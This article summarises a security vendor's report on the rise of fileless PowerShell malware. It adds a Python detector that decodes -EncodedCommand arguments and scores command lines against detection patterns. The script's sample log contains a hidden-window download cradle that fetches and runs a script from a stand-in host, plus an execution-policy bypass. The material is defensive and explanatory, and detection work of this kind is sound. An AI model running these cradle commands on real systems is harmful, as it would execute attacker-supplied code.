According to a recent survey, the use of fileless malware skyrocketed last year as attackers explored new ways to bypass conventional security controls.
According to a study from WatchGuard Technologies, the use of fileless malware grew rapidly last year as attackers sought new ways to circumvent conventional security controls. The report was compiled from Firebox Feed data, threat intelligence, and a research honeynet.
Attackers are said to have used toolkits such as PowerSploit and Cobalt Strike to inject malicious code into running processes, so that the code kept running even after the original script was detected and removed. Other findings in the study included the return of The Moon, a trojan targeting IoT devices and consumer routers, the continued use of cryptominers, and a list of the top malicious domains. This is the first time The Moon trojan has appeared in WatchGuard’s top 10 malware list.
About Fileless Malware
A fileless malware attack based on PowerShell uses PowerShell’s native capabilities against the victim. One of the PowerShell cmdlets best suited to such an attack is the Invoke-Command cmdlet. This cmdlet is used to run a PowerShell command.
Fileless malware uses covert techniques to hijack legitimate programs, avoiding detection by most security solutions. Because it writes no files to disk and leaves little trace, fileless malware is difficult to detect and frustrates even experienced forensic analysts.
To get past checks that reject malformed input, a fileless attack uses a carefully crafted string of instructions known as the payload, which is typically Base64-encoded. This payload can be delivered to the target host in a number of ways, including through a website’s input field, a network connection, a packet sent over a network protocol (TCP/IP, HTTP, WebRTC, RTP, DNS, and so on), or a script embedded in a file.
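The two points above (PowerShell's native cmdlets being abused for in-memory execution, and payloads arriving Base64-encoded) are exactly what a defender looks for in process-creation logs. The following Python script is an added example written for this article; it is not part of the WatchGuard report or any vendor tool. It takes a few constructed log lines in a hypothetical "CommandLine=" format, decodes any -EncodedCommand argument (PowerShell expects Base64 of the UTF-16LE script text), and scores each command line against indicators commonly associated with fileless execution (Invoke-Command, Invoke-Expression, download cradles, reflective assembly loading, hidden windows). The log format, host names and the example.invalid URL are all constructed for the demonstration.

```python
import base64
import re
from typing import Optional

# Indicators commonly seen alongside in-memory (fileless) PowerShell execution.
# These are heuristics, not proof of compromise; the score below combines them.
SUSPICIOUS_PATTERNS = {
    "invoke-command": re.compile(r"invoke-command", re.I),
    "invoke-expression": re.compile(r"\b(invoke-expression|iex)\b", re.I),
    "download-cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I),
    "reflection-load": re.compile(r"\[(system\.)?reflection\.assembly\]::load", re.I),
    "hidden-window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "noprofile": re.compile(r"-nop(rofile)?\b", re.I),
}

# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe.
ENCODED_FLAG = re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries an encoded command, else None.

    PowerShell expects Base64 over the UTF-16LE bytes of the script text, so anything
    that does not decode cleanly that way is treated as 'not an encoded command'.
    """
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(2), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_command_line(cmdline: str) -> dict:
    """Score one command line; the decoded script (if any) is scanned together with it."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + " " + decoded
    hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(text)]
    if decoded is not None:
        hits.append("encoded-command")
    hits.sort()
    return {
        "decoded": decoded,
        "indicators": hits,
        "score": len(hits),
        "suspicious": len(hits) >= 2,  # hypothetical threshold: two indicators together
    }


def scan_log(lines) -> list:
    """Extract the CommandLine= field from each constructed log line and analyse it."""
    results = []
    for line in lines:
        cmdline = line.split("CommandLine=", 1)[1] if "CommandLine=" in line else line
        result = analyse_command_line(cmdline)
        result["line"] = line
        results.append(result)
    return results


def encode_for_powershell(script: str) -> str:
    """Build the Base64/UTF-16LE form PowerShell expects; used here only to construct sample data."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample log lines (hypothetical format; not real telemetry).
_ENCODED_SCRIPT = encode_for_powershell(
    "Invoke-Command -ComputerName localhost -ScriptBlock { Get-Process }"
)
_IMAGE = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_LOG = [
    # Benign scheduled script: only one weak indicator (-NoProfile).
    f"2021-03-02T10:15:03Z host01 ProcessCreate Image={_IMAGE} "
    "CommandLine=powershell.exe -NoProfile -File C:\\scripts\\backup.ps1",
    # Plain-text download cradle run in a hidden window.
    f"2021-03-02T10:16:44Z host01 ProcessCreate Image={_IMAGE} "
    "CommandLine=powershell.exe -nop -w hidden -c "
    "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')\"",
    # Encoded command hiding an Invoke-Command call.
    f"2021-03-02T10:17:09Z host02 ProcessCreate Image={_IMAGE} "
    f"CommandLine=powershell.exe -ExecutionPolicy Bypass -EncodedCommand {_ENCODED_SCRIPT}",
]


if __name__ == "__main__":
    for r in scan_log(SAMPLE_LOG):
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{flag:10} score={r['score']} indicators={r['indicators']}")
        if r["decoded"]:
            print(f"           decoded: {r['decoded']}")
```

The point of decoding before matching is that a signature written only against the raw command line never sees Invoke-Command inside the Base64 blob; the third sample line scores zero without the decode step. In production this logic belongs on Sysmon Event ID 1 or Windows Security 4688 command lines, complemented by PowerShell script block logging (Event ID 4104), which records the decoded script regardless of how it was delivered.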
Some Statistics
According to the study, fileless malware detections increased by 888 percent year over year as attackers tried to evade endpoint security by launching attacks without traditional malware. In Q4, nearly 47% of all cyber attacks were encrypted, with malware delivered over HTTPS increasing by 41% and encrypted zero-day variants increasing by 22% over Q3.
Despite the widespread adoption of remote working, network attack detections increased by 5% in the fourth quarter, hitting their highest level in two years. In comparison to Q3, the total number of specific attack signatures increased by 4%. Furthermore, in 2020, the vendor saw 25% more cryptocurrency mining malware than in 2019.
As more workers operate from home, overall perimeter-detected malware decreased by 4% quarter over quarter. Year over year, the number of unique cryptominer variants increased by more than 25%, reaching 850 in 2020.
DNSWatch blocked a total of 1,313,686 malicious domain connections in Q4. Attacks on Asia-Pacific networks decreased by 16 points, while attacks in AMER and EMEA increased by nearly the same amount.
Concluding Words
Cybercriminals’ use of advanced, evasive threat techniques increased over the last year, highlighting the value of layered, end-to-end security defences. Organizations now need a comprehensive security policy that combines endpoint safeguards, network defences, security awareness training, threat intelligence, and strict patch management to defend against such threats.